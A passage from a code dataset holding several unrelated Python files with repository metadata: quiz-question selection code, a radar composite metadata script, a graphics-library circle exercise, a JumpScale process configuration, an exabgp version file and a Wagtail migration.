Util.processed_list_dict(cos_836_questions, cos_836_answers)
cos_836_selected_six_random = Util.select_six_random(cos_836_list_of_dictionaries_of_questions_and_answers)
# COS834
cos_838_questions = dataset.iloc[1:, 8:9].values
cos_838_answers = dataset.iloc[1:, 9].values
cos_838_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_838_questions, cos_838_answers)
cos_834_selected_six_random = Util.select_six_random(cos_838_list_of_dictionaries_of_questions_and_answers)
# COS838
cos_838_questions = dataset.iloc[1:, 10:11].values
cos_838_answers = dataset.iloc[1:, 11].values
cos_838_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_838_questions, cos_838_answers)
cos_838_selected_six_random = Util.select_six_random(cos_838_list_of_dictionaries_of_questions_and_answers)
# Getting total questions and answers to be asked for ever user
ai_total_questions_and_answer = Util.all_selected_questions_with_answers(cos_833_selected_six_random,
cos_816_selected_six_random,
cos_830_selected_six_random,
cos_836_selected_six_random,
cos_834_selected_six_random,
cos_838_selected_six_random)
# print(total_questions_and_answer)
for i in ai_total_questions_and_answer.values():
for j in i:
ai_total_questions += 1
| [
"[email protected]"
] | |
9d449527cdaa26e79a17950d62dcc6a2bdc7d18c | 34f1b1fc2fbca6b61858a83cbdf498fe99648209 | /scripts/create_metadata.py | 7da66e6aad7430fd22dfd617cee183a90212288c | [
"Apache-2.0"
] | permissive | firth/radcomp | 88a97b2918b3e0683d181085d10e3f8a78549e93 | a855a66189b1d7867a6c373d3fdc6ce67f6d3c01 | refs/heads/master | 2020-12-25T02:25:32.772407 | 2020-10-07T02:43:18 | 2020-10-07T02:43:18 | 41,178,899 | 0 | 0 | null | 2020-10-07T02:43:19 | 2015-08-21T21:49:04 | Python | UTF-8 | Python | false | false | 2,840 | py | """ Create the auxillary JSON metadata that goes with this production
{"meta": {"vcp": 212, "product": "N0Q", "valid": "2014-06-25T20:43:55Z",
"site": "DMX"}}
This magic requires that some modifications were done to nex2img to get this
information included in the GEMPAK log file
--- a/gempak/source/programs/upc/programs/nex2img/nex2img.f
+++ b/gempak/source/programs/upc/programs/nex2img/nex2img.f
@@ -221,7 +221,7 @@ C
IF (ierf.eq.0) THEN
viewable = .true.
ifile = 1
-
+ write(*, *) 'Searching radar: ', stid
CALL ST_RPST(tpath,'%SITE%',stid,ipos,
+ outstr, ier)
CALL ST_RPST(outstr,'%PROD%',gfunc,ipos,
@@ -256,6 +256,7 @@ C
radproj = 'RAD|D'
radarea = 'dset'
idrpfl = 0
+ write(*, *) 'Using image: ', imgfls
CALL GG_MAPS ( radproj, radarea, imgfls,
+ idrpfl, ier )
C
"""
import json
import sys
import os
import datetime
import tempfile
import subprocess
def main():
"""Go Main Go."""
sector = sys.argv[1]
ts = datetime.datetime(
int(sys.argv[2]),
int(sys.argv[3]),
int(sys.argv[4]),
int(sys.argv[5]),
int(sys.argv[6]),
)
utcnow = datetime.datetime.utcnow()
seconds = (utcnow - ts).days * 86400.0 + (utcnow - ts).seconds
if seconds > 300:
sys.exit()
prod = sys.argv[7]
job = sys.argv[9]
starttime = datetime.datetime.strptime(sys.argv[8], "%Y%m%d%H%M%S")
utcnow = datetime.datetime.utcnow()
radars = 0
used = 0
logfn = "logs/nex2img_%s_%s_%s.log" % (sector, prod, job)
if os.path.isfile(logfn):
for line in open(logfn):
if line.find("Searching radar:") > 0:
radars += 1
elif line.find("Using image:") > 0:
used += 1
else:
print(f"create_metadata log file {logfn} missing")
res = {
"meta": {
"vcp": None,
"product": prod,
"site": "%sCOMP" % (sector,),
"valid": ts.strftime("%Y-%m-%dT%H:%M:%SZ"),
"processing_time_secs": (utcnow - starttime).seconds,
"radar_quorum": "%s/%s" % (used, radars),
}
}
(tmpfp, tmpfn) = tempfile.mkstemp()
os.write(tmpfp, json.dumps(res).encode("utf-8"))
os.close(tmpfp)
cmd = (
"pqinsert -p 'gis r %s gis/images/4326/%sCOMP/%s_ bogus json' %s"
) % (ts.strftime("%Y%m%d%H%M"), sector, prod.lower(), tmpfn)
subprocess.call(cmd, shell=True)
os.unlink(tmpfn)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
5272cd23752277cc1560b83a7879696d5c876c27 | f7aac490b6bdda8a49a6d14534ef733e2cd34bcc | /Code for 1.10.2018/drawCircleXYMove-wrap.py | c3af761110a39aa3ca365c1e84745d4026d2937b | [] | no_license | nmessa/Stratham-Girls-Coding-Club | 67c203fa88f62f2603b62a0d0fd50135a03f69dc | 1bc786b6c794cc3159ed72be25130f9452fb23f6 | refs/heads/master | 2021-05-06T18:01:14.349667 | 2019-03-12T15:26:57 | 2019-03-12T15:26:57 | 111,935,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py | ## Draw Circle
## Author: nmessa
## Draws a circle moving in X and Y direction
## wraps around when it gets to the edge of the screen
from graphics import *
import time
def main():
height = 640
width = 640
radius = 50
#Create a windows to draw in
win = GraphWin('Circle Move XY with wraparound', width, height)
win.setBackground('white')
#Define a circle to draw
shape = Circle(Point(0, 0), radius)
#set the drawing parameters
shape.setOutline("red")
shape.setFill("green")
shape.setWidth(10)
#draw the circle in the window
shape.draw(win)
dx = 10
dy = 10
while True:
#Add code here
time.sleep(3)
win.close()
main()
| [
"[email protected]"
] | |
198e9d1ccf06652376cec667659e83c694b12771 | 3d1ee3ddb516f0b499f6272fbc7fbd6eefb88a63 | /jpackages/oss/1.0/actions/process.configure.py | a26799fc2992b053ec26cda45d6f47eafac6c365 | [] | no_license | despiegk/jp_serverapps | e72005004273db9dc01d1e64ddfcb28d06137f1f | 82ecc0b56ac85b2fb2d1eb02a80ab4ac99026f47 | refs/heads/master | 2016-09-06T16:06:39.529847 | 2014-08-17T10:17:03 | 2014-08-17T10:17:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,243 | py | def main(j,jp):
pass
#configure the application to autostart
# jp.log("set autostart $(jp.name)")
#numprocesses: if more than 1 process, will be started in tmux as $name_$nr
#ports: tcpports
#autostart: does this app start auto
#stopcmd: if special command to stop
#check: check app to see if its running
#stats: gather statistics by process manager
#timeoutcheck: how long do we wait to see if app active
#isJSapp: to tell system if process will self register to redis (is jumpscale app)
# pd=j.tools.startupmanager.addProcess(\
# name=jp.name,\
# cmd="python", \
# args="portal_start.py",\
# env={},\
# numprocesses=1,\
# priority=100,\
# shell=False,\
# workingdir='$base/apps/oss',\
# jpackage=jp,\
# domain="solutions",\
# ports=[82],\
# autostart=True,\
# reload_signal=0,\
# user="root",\
# log=True,\
# stopcmd=None,\
# check=True,\
# timeoutcheck=10,\
# isJSapp=1,\
# upstart=False,\
# stats=False,\
# processfilterstr="")#what to look for when doing ps ax to find the process
# pd.start()
| [
"[email protected]"
] | |
af35d9e3ecf3fb8d84581752c65f3cf3e9dc1c7d | 237db09490a4fc5976e6f8a8eb783b928bde1cac | /lib/exabgp/version.py | 3ea942e734182c2966ab29fa48eb5abce8e67786 | [] | no_license | brijohn/exabgp | c80a348035ff104b8d9e9c44ae07f97bf8e33728 | 788bde2842f2c2bc22580d0641003f2e93ff56ac | refs/heads/master | 2020-12-25T17:56:51.444190 | 2017-05-30T16:14:59 | 2017-05-30T16:14:59 | 65,487,232 | 0 | 0 | null | 2016-08-11T17:11:12 | 2016-08-11T17:11:12 | null | UTF-8 | Python | false | false | 245 | py | import os
release = "4.0.0-0478a014"
json = "4.0.0"
text = "4.0.0"
version = os.environ.get('EXABGP_VERSION',release)
# Do not change the first line as it is parsed by scripts
if __name__ == '__main__':
import sys
sys.stdout.write(version)
| [
"[email protected]"
] | |
c204c0ca912de6b8876285198e54ba6d72afbf93 | eb93b37c5a76ef09c967ecfd32dc77f0a0e75bef | /article/migrations/0003_auto_20190712_1558.py | 081657f7d7bbbd5e642424535d10296f6309e9ec | [] | no_license | uktrade/data-hub-helpcentre | 9a58d466b264ccdaafea12576039dcf8f2c19015 | 74f741345df3b35164f6d4c1f17bc56c709a4662 | refs/heads/master | 2023-08-16T22:36:14.704989 | 2023-08-15T08:58:10 | 2023-08-15T08:58:10 | 199,607,056 | 4 | 2 | null | 2023-08-15T08:58:12 | 2019-07-30T08:15:54 | CSS | UTF-8 | Python | false | false | 696 | py | # Generated by Django 2.2.3 on 2019-07-12 15:58
import wagtail.blocks
import wagtail.fields
import wagtail.images.blocks
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("article", "0002_auto_20190712_1537"),
]
operations = [
migrations.AlterField(
model_name="articlepage",
name="body",
field=wagtail.fields.StreamField(
[
("paragraph", wagtail.blocks.RichTextBlock()),
("image", wagtail.images.blocks.ImageChooserBlock()),
],
blank=True,
null=True,
),
),
]
| [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.